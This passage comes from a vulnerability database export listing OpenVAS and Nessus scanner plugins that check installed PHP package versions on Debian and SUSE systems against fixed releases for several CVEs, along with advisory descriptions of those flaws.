Removing this package won't remove\nPHP5 from your system, however it may remove other packages that depend on this\none.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 5.4.36-0+deb7u1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream version\n5.4.36, which includes additional bug fixes, new features and possibly\nincompatible changes. Please refer to the upstream changelog for more\ninformation:\n\nhttp://php.net/ChangeLog-5.php#5.4.36\n\nTwo additional patches were applied\non top of the imported new upstream version. An out-of-bounds read flaw was\nfixed which could lead php5-cgi to crash. 
Moreover a bug with php5-pgsql in\ncombination with PostgreSQL 9.1 was fixed (Debian Bug #773182).\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.36-0+deb7u1\", 
rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", 
ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-22T16:39:33", "bulletinFamily": "scanner", "description": "This host is installed with PHP and is\n prone to use-after-free vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-01-07T00:00:00", "id": "OPENVAS:1361412562310805411", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805411", "title": "PHP Use-After-Free Remote Code EXecution Vulnerability - Jan15", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_use_after_free_vuln_jan15.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# PHP Use-After-Free Remote Code EXecution Vulnerability - Jan15\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805411\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-07 10:42:19 +0530 (Wed, 07 Jan 2015)\");\n script_name(\"PHP Use-After-Free Remote Code EXecution Vulnerability - Jan15\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is\n prone to use-after-free vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to Use-after-free\n vulnerability in the process_nested_data function in ext/standard/var\n _unserializer.re in PHP.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code via a crafted unserialize call.\");\n\n script_tag(name:\"affected\", value:\"PHP versions 5.4.x before 5.4.36,\n 5.5.x before 5.5.20 and 5.6.x before 5.6.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.4.36\n or 5.5.20 or 5.6.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", 
value:\"http://secunia.com/advisories/60920\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=68594\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(phpVer =~ \"^5\\.[4-6]\"){\n if(version_in_range(version:phpVer, test_version:\"5.4.0\", test_version2:\"5.4.35\")||\n version_in_range(version:phpVer, test_version:\"5.5.0\", test_version2:\"5.5.19\")||\n version_in_range(version:phpVer, test_version:\"5.6.0\", test_version2:\"5.6.3\")){\n report = report_fixed_ver(installed_version:phpVer, fixed_version:\"5.4.36/5.5.20/5.6.4\");\n security_message(data:report, port:phpPort);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:55:31", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n mod_php4-core\n apache2-mod_php4\n php4-servlet\n php4\n php4-imap\n php4-mysql\n php4-session\n apache-mod_php4\n mod_php4-servlet\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020404 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65134", "id": "OPENVAS:65134", "title": "SLES9: Security update for PHP4", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020404.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n mod_php4-core\n apache2-mod_php4\n php4-servlet\n php4\n php4-imap\n php4-mysql\n php4-session\n apache-mod_php4\n mod_php4-servlet\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020404 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65134);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-1019\", \"CVE-2004-1065\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_php4-core\", rpm:\"mod_php4-core~4.3.4~43.25\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:09", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n apache2-mod_php4\n php4-servlet\n php4\n php4-imap\n php4-mysql\n php4-session\n apache-mod_php4\n mod_php4-servlet\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020404 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065134", "id": "OPENVAS:136141256231065134", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020404.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n mod_php4-core\n apache2-mod_php4\n php4-servlet\n php4\n php4-imap\n php4-mysql\n php4-session\n apache-mod_php4\n mod_php4-servlet\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020404 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65134\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-1019\", \"CVE-2004-1065\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_php4-core\", rpm:\"mod_php4-core~4.3.4~43.25\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:52", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php4\n php4-imap\n php4\n php4-mysql\n mod_php4-servlet\n php4-servlet\n mod_php4-core\n php4-session\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020183 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65465", "id": "OPENVAS:65465", "title": "SLES9: Security update for PHP4", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020183.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n apache2-mod_php4\n php4-imap\n php4\n php4-mysql\n mod_php4-servlet\n php4-servlet\n mod_php4-core\n php4-session\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020183 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65465);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-1019\", \"CVE-2004-1065\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php4\", rpm:\"apache2-mod_php4~4.3.4~43.22\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:12", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n apache2-mod_php4\n php4-imap\n php4\n php4-mysql\n mod_php4-servlet\n php4-servlet\n mod_php4-core\n php4-session\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020183 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065465", "id": "OPENVAS:136141256231065465", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020183.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n apache2-mod_php4\n php4-imap\n php4\n php4-mysql\n mod_php4-servlet\n php4-servlet\n mod_php4-core\n php4-session\n apache-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020183 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65465\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-1019\", \"CVE-2004-1065\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php4\", rpm:\"apache2-mod_php4~4.3.4~43.22\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-07T04:53:49", "bulletinFamily": "scanner", "description": "php5 was updated to fix four security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-0231: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.37,\n 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate numerical keys within the serialized\n properties of an object. 
NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142\n (bnc#910659).\n\n - CVE-2014-9427: sapi/cgi/cgi_main.c in the CGI component\n in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x\n through 5.6.4, when mmap is used to read a .php file,\n did not properly consider the mapping's length during\n processing of an invalid file that begins with a #\n character and lacks a newline character, which caused an\n out-of-bounds read and might (1) allow remote attackers\n to obtain sensitive information from php-cgi process\n memory by leveraging the ability to upload a .php file\n or (2) trigger unexpected code execution if a valid PHP\n script is present in memory locations adjacent to the\n mapping (bnc#911664).\n\n - CVE-2015-0232: The exif_process_unicode function in\n ext/exif/exif.c in PHP before 5.4.37, 5.5.x before\n 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers\n to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bnc#914690).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.36,\n 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bnc#910659).\n\nAdditionally a fix was included that protects against a possible NULL\npointer use (bnc#910659).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-02-06T00:00:00", "published": "2019-01-02T00:00:00", "id": "SUSE_SU-2015-0365-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119961", "title": "SUSE SLES12 Security Update : php5 (SUSE-SU-2015:0365-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0365-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119961);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/02/06 11:41:39\");\n\n script_cve_id(\"CVE-2004-1019\", \"CVE-2014-8142\", \"CVE-2014-9427\", \"CVE-2015-0231\", \"CVE-2015-0232\");\n script_bugtraq_id(71791, 71833, 72539, 72541);\n\n script_name(english:\"SUSE SLES12 Security Update : php5 (SUSE-SU-2015:0365-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php5 was updated to fix four security issues.\n\nThese security issues were fixed :\n\n - 